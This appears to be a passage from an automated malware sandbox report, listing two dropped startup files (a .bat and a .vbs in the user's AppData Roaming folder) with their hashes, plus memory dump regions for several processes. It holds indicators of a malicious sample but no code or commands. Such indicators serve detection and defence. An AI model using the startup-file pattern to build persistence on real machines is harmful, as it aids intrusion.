C:\Users\Admin\AppData\Roaming\startup_str_534.batFilesize
723KB
MD5beb1362e7de769ce5332ea614d48b508
SHA13b8db446968c37b66df57c21868331ae2a63d716
SHA2563785896edb293ff81a5d511d761602739e712118aaf8e5e78986e389eb8cbd25
SHA5128a52b4e50d49498288da73fe2b0ea12d67a0fadda4697b6adb6151cd65c33fddf3d4829d3fdda1dea56b65c7f5b7abe0bd20452ba40f7d3f2fcd4b8d69bc6830
-
C:\Users\Admin\AppData\Roaming\startup_str_534.vbsFilesize
115B
MD5360bb30336a5b49226d9c4baa5013778
SHA1516b6e0a304b042d7c3d33e166d4bb8236d27cbb
SHA2566b903426d215de176a4e8be2ed0891f4f3933aede3c7a5cbac5abcb6b52ce4e7
SHA512979716eec9d585bb23ec641f5f34df448ff674606d0aefd73bfc69571a3b3ec33b0957276668a97060ccbb01b102be514313e248c0a292740ed14b8c9b137337
-
memory/888-51-0x0000000007720000-0x0000000007731000-memory.dmpFilesize
68KB
-
memory/888-55-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-52-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-35-0x0000000070BD0000-0x0000000070C1C000-memory.dmpFilesize
304KB
-
memory/888-50-0x00000000077A0000-0x0000000007836000-memory.dmpFilesize
600KB
-
memory/888-49-0x0000000007590000-0x000000000759A000-memory.dmpFilesize
40KB
-
memory/888-48-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-34-0x0000000007380000-0x00000000073B4000-memory.dmpFilesize
208KB
-
memory/888-47-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-24-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-25-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-45-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/888-44-0x00000000067B0000-0x00000000067CE000-memory.dmpFilesize
120KB
-
memory/888-46-0x00000000073D0000-0x0000000007474000-memory.dmpFilesize
656KB
-
memory/1092-20-0x0000000000C50000-0x0000000000C58000-memory.dmpFilesize
32KB
-
memory/1092-4-0x0000000004F90000-0x0000000004FB2000-memory.dmpFilesize
136KB
-
memory/1092-21-0x0000000006FD0000-0x0000000007060000-memory.dmpFilesize
576KB
-
memory/1092-0-0x00000000749EE000-0x00000000749EF000-memory.dmpFilesize
4KB
-
memory/1092-19-0x0000000006E90000-0x0000000006EAA000-memory.dmpFilesize
104KB
-
memory/1092-18-0x0000000007570000-0x0000000007BEA000-memory.dmpFilesize
6.5MB
-
memory/1092-17-0x0000000005D60000-0x0000000005DAC000-memory.dmpFilesize
304KB
-
memory/1092-16-0x0000000005D30000-0x0000000005D4E000-memory.dmpFilesize
120KB
-
memory/1092-15-0x0000000005890000-0x0000000005BE7000-memory.dmpFilesize
3.3MB
-
memory/1092-6-0x0000000005820000-0x0000000005886000-memory.dmpFilesize
408KB
-
memory/1092-5-0x0000000005130000-0x0000000005196000-memory.dmpFilesize
408KB
-
memory/1092-1-0x0000000002950000-0x0000000002986000-memory.dmpFilesize
216KB
-
memory/1092-2-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/1092-73-0x00000000749E0000-0x0000000075191000-memory.dmpFilesize
7.7MB
-
memory/1092-3-0x00000000051F0000-0x000000000581A000-memory.dmpFilesize
6.2MB
-
memory/1092-22-0x000000000A1A0000-0x000000000A746000-memory.dmpFilesize
5.6MB
-
memory/1364-110-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1364-113-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1364-111-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1364-112-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1364-115-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1364-116-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmpFilesize
2.0MB
-
memory/1364-117-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmpFilesize
756KB
-
memory/4480-79-0x00000000077E0000-0x0000000007872000-memory.dmpFilesize
584KB
-
memory/4480-106-0x0000000007960000-0x000000000796A000-memory.dmpFilesize
40KB
-
memory/4480-104-0x000000000A7A0000-0x000000000A7DC000-memory.dmpFilesize
240KB
-
memory/4480-94-0x0000000004E70000-0x0000000004E82000-memory.dmpFilesize
72KB
-
memory/4480-78-0x00000000076B0000-0x000000000771C000-memory.dmpFilesize
432KB
-
memory/4628-109-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmpFilesize
756KB
-
memory/4628-108-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmpFilesize
2.0MB
-
memory/4628-107-0x0000018DFD6E0000-0x0000018DFD70A000-memory.dmpFilesize
168KB
-
memory/4628-95-0x0000018DFD310000-0x0000018DFD332000-memory.dmpFilesize
136KB